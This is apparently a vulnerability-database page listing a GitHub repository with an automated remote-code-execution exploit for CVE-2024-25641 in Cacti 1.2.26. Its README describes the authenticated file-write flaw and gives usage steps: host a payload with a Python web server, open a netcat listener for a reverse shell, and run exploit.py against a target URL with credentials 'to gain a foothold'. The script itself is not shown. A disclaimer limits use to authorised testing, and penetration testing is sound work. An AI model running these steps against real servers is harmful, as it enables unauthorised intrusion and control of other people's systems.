CVE-2024-25641 PoC — Cacti 安全漏洞

Source

Associated Vulnerability

Description

CVE-2024-25641 - RCE Automated Exploit - Cacti 1.2.26

Readme

# CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26 

Fully automated exploit for CVE-2024-25641.
When a user is authenticated, Cacti version 1.2.26 is vulnerable to an arbitrary file write vulnerability, exploitable through the "Package Import" feature,
allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).

Credits to this PoC : https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88
(I have simply automated this to gain a foothold.)

## DISCLAIMER
This tool is intended for educational and testing purposes only. The author of this tool is not responsible for any misuse or illegal activities performed with it. 
Use this tool only on systems you own or have explicit permission to test. 
Unauthorized access to computer systems is illegal and unethical.

## Example of Use
```bash
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>

# Setup netcat listener
nc -lvnp <LOCAL_PORT>

# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>

File Snapshot

 [4.0K]  /data/pocs/07587007fdee73998907461bce9553ffdf8f84f7
├── [8.5K]  exploit.py
├── [1.3K]  README.md
└── [  57]  requirements.txt

0 directories, 3 files

Remarks